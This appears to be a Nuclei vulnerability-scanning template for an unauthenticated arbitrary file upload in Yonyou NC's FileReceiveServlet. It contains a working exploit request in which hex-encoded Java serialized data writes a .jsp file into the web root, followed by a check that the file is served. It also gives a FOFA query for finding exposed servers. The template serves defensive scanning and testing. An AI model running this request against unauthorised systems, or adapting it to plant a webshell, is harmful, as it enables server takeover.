40 lines
1.6 KiB
YAML
Executable File
40 lines
1.6 KiB
YAML
Executable File
id: yonyou-filereceiveservlet-fileupload
|
|
|
|
info:
|
|
name: Yonyou NC FileReceiveServlet - Aribitrary File Upload
|
|
author: bjxsec
|
|
severity: critical
|
|
description: |
|
|
An unauthorized attacker can upload a file via the FileReceiveServlet endpoint.
|
|
reference:
|
|
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-nc-arbitrary-file-upload.yaml
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
fofa-query: app="用友-UFIDA-NC"
|
|
tags: yonyou,file-upload,intrusive
|
|
variables:
|
|
file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"
|
|
file_content: "{{randstr}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /servlet/FileReceiveServlet HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data;
|
|
|
|
{{hex_decode("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C7708000000100000000274000946494C455F4E414D45740009")}}{{file_name}}{{hex_decode("7400105441524745545F46494C455F504154487400102E2F776562617070732F6E635F77656278")}}{{file_content}}
|
|
- |
|
|
GET /{{file_name}} HTTP/1.1
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Host: {{Hostname}}
|
|
|
|
req-condition: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "status_code_1 == 200 && status_code_2 == 200"
|
|
- "contains(body_2, '{{file_content}}')"
|
|
condition: and
|
|
# digest: 4a0a00473045022100dbda103ee05560f985e28b7ed7246cf8d1e4cf09da32a9d3b1645f86e5e14b740220651e7c2efef0e9014dc27f726ace13bb66b3e82e1f6d200ae08eb3c45cf1a35f:922c64590222798bb761d5b6d8e72950 |